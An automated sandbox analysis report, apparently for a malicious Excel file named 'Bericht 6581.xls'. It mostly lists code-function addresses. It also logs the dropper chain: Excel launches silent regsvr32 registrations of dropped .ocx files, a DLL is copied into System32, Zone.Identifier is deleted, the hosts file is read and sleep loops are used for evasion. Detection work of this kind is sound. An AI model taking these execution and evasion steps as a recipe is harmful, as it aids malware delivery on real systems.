Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004067C 7_2_000000018004067C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004E6F0 7_2_000000018004E6F0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C6FC 7_2_000000018001C6FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E734 7_2_000000018001E734
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018758 7_2_0000000180018758
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800287E4 7_2_00000001800287E4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018860 7_2_0000000180018860
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016870 7_2_0000000180016870
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800548F8 7_2_00000001800548F8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002C900 7_2_000000018002C900
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E91C 7_2_000000018001E91C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C92C 7_2_000000018001C92C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016978 7_2_0000000180016978
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800189CC 7_2_00000001800189CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026A24 7_2_0000000180026A24
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016A80 7_2_0000000180016A80
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001EB04 7_2_000000018001EB04
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018B10 7_2_0000000180018B10
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001CB18 7_2_000000018001CB18
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016B8C 7_2_0000000180016B8C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004EBA0 7_2_000000018004EBA0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018C54 7_2_0000000180018C54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002CCCC 7_2_000000018002CCCC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016CE8 7_2_0000000180016CE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001CD00 7_2_000000018001CD00
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001ED30 7_2_000000018001ED30
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018D98 7_2_0000000180018D98
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016DF0 7_2_0000000180016DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004CEC8 7_2_000000018004CEC8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018EC8 7_2_0000000180018EC8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016EF8 7_2_0000000180016EF8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001EF18 7_2_000000018001EF18
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001CF2C 7_2_000000018001CF2C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180042F88 7_2_0000000180042F88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018FD0 7_2_0000000180018FD0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017000 7_2_0000000180017000
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800190D8 7_2_00000001800190D8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F104 7_2_000000018001F104
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001D114 7_2_000000018001D114
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017158 7_2_0000000180017158
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002D19C 7_2_000000018002D19C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800191E0 7_2_00000001800191E0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017260 7_2_0000000180017260
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001D2FC 7_2_000000018001D2FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004F2FC 7_2_000000018004F2FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001B310 7_2_000000018001B310
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F334 7_2_000000018001F334
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180019338 7_2_0000000180019338
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017368 7_2_0000000180017368
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180019440 7_2_0000000180019440
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017474 7_2_0000000180017474
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002B49C 7_2_000000018002B49C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001B4F8 7_2_000000018001B4F8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F520 7_2_000000018001F520
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001D528 7_2_000000018001D528
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180019548 7_2_0000000180019548
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800175D0 7_2_00000001800175D0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180019650 7_2_0000000180019650
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002D680 7_2_000000018002D680
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_003B0000 8_2_003B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A804 8_2_0214A804
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A408 8_2_0214A408
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02157E28 8_2_02157E28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214406C 8_2_0214406C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153894 8_2_02153894
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02137CAC 8_2_02137CAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C8C0 8_2_0214C8C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146110 8_2_02146110
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135B18 8_2_02135B18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215A304 8_2_0215A304
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02148B3C 8_2_02148B3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152F3C 8_2_02152F3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214BD64 8_2_0214BD64
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02131368 8_2_02131368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02144368 8_2_02144368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021341A8 8_2_021341A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 8_2_0214C9F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147FEC 8_2_02147FEC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147414 8_2_02147414
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143210 8_2_02143210
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143610 8_2_02143610
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02131014 8_2_02131014
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F61C 8_2_0214F61C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146418 8_2_02146418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143E18 8_2_02143E18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152E04 8_2_02152E04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213BC08 8_2_0213BC08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147C30 8_2_02147C30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02155E30 8_2_02155E30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F238 8_2_0214F238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152638 8_2_02152638
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132820 8_2_02132820
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D620 8_2_0214D620
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154020 8_2_02154020
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214762C 8_2_0214762C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214B028 8_2_0214B028
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D254 8_2_0214D254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F850 8_2_0213F850
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02145C50 8_2_02145C50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213E254 8_2_0213E254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EE5C 8_2_0214EE5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213FE58 8_2_0213FE58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213C458 8_2_0213C458
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02159A40 8_2_02159A40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214484C 8_2_0214484C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215344C 8_2_0215344C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134848 8_2_02134848
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152C48 8_2_02152C48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214FC70 8_2_0214FC70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134078 8_2_02134078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134C64 8_2_02134C64
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140C68 8_2_02140C68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150C68 8_2_02150C68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F290 8_2_0213F290
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215BE90 8_2_0215BE90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215369C 8_2_0215369C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02136698 8_2_02136698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B698 8_2_0213B698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133A9C 8_2_02133A9C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140680 8_2_02140680
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135484 8_2_02135484
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215A088 8_2_0215A088
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021446B4 8_2_021446B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B6BC 8_2_0215B6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021330BC 8_2_021330BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B2BC 8_2_0213B2BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021576A4 8_2_021576A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021414A0 8_2_021414A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214E4A8 8_2_0214E4A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021516A8 8_2_021516A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213FAD0 8_2_0213FAD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D4D0 8_2_0214D4D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021390D4 8_2_021390D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021584DC 8_2_021584DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021478C4 8_2_021478C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150AC4 8_2_02150AC4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149EC0 8_2_02149EC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213CCC8 8_2_0213CCC8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154EF4 8_2_02154EF4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021512FC 8_2_021512FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152AFC 8_2_02152AFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B0F8 8_2_0213B0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021424E4 8_2_021424E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021336E0 8_2_021336E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021372E0 8_2_021372E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02138CE0 8_2_02138CE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02151AE0 8_2_02151AE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132AE4 8_2_02132AE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214ACEC 8_2_0214ACEC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B0EC 8_2_0215B0EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133CE8 8_2_02133CE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158EE8 8_2_02158EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143D1C 8_2_02143D1C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154918 8_2_02154918
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153304 8_2_02153304
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213D300 8_2_0213D300
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132708 8_2_02132708
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EB08 8_2_0214EB08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A130 8_2_0214A130
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154330 8_2_02154330
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215093C 8_2_0215093C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156F3C 8_2_02156F3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143724 8_2_02143724
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147B24 8_2_02147B24
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C720 8_2_0214C720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149720 8_2_02149720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215BD20 8_2_0215BD20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156520 8_2_02156520
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213BD24 8_2_0213BD24
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02151D2C 8_2_02151D2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215632C 8_2_0215632C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158B28 8_2_02158B28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213D92C 8_2_0213D92C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149D5C 8_2_02149D5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215155C 8_2_0215155C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214B558 8_2_0214B558
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02138F5C 8_2_02138F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147144 8_2_02147144
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133F40 8_2_02133F40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156B40 8_2_02156B40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134948 8_2_02134948
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B570 8_2_0215B570
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213DB74 8_2_0213DB74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146978 8_2_02146978
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140578 8_2_02140578
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F764 8_2_0214F764
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140B60 8_2_02140B60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215796C 8_2_0215796C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213CB6C 8_2_0213CB6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02142F94 8_2_02142F94
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02144594 8_2_02144594
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146594 8_2_02146594
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158990 8_2_02158990
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135198 8_2_02135198
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F580 8_2_0213F580
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213ED84 8_2_0213ED84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02141B88 8_2_02141B88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143BB4 8_2_02143BB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147DB0 8_2_02147DB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02137BB4 8_2_02137BB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021429BC 8_2_021429BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150DBC 8_2_02150DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214E7A4 8_2_0214E7A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021427A4 8_2_021427A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C5AC 8_2_0214C5AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EFAC 8_2_0214EFAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B1A8 8_2_0213B1A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02159DA8 8_2_02159DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021393AC 8_2_021393AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153DD4 8_2_02153DD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021507D0 8_2_021507D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021325D8 8_2_021325D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214ABD8 8_2_0214ABD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D9C4 8_2_0214D9C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132DC0 8_2_02132DC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213DFCC 8_2_0213DFCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213EFCC 8_2_0213EFCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021499F4 8_2_021499F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021331F0 8_2_021331F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021513FC 8_2_021513FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021493E0 8_2_021493E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213AFE4 8_2_0213AFE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B3E4 8_2_0213B3E4
Source: Bericht 6581.xls Metadefender: Detection: 34%
Source: Bericht 6581.xls ReversingLabs: Detection: 46%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5669.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/11@4/51
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Bericht 6581.xls OLE indicator, Workbook stream: true
Source: Bericht 6581.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A804 Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,CloseHandle, 8_2_0214A804
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800011AC LoadStringW,LoadStringW,FindResourceA,LoadResource,LockResource, 7_2_00000001800011AC
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Bericht 6581.xls Initial sample: OLE indicators vbamacros = False
PE file contains sections with non-standard names
Source: I7IggNeBzEXeF5[1].dll.0.dr Static PE information: section name: _RDATA
Source: soci4.ocx.0.dr Static PE information: section name: _RDATA
Registers a DLL
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 1296 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1780 Thread sleep time: -300000s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to dropped file
Found large amount of non-executed APIs
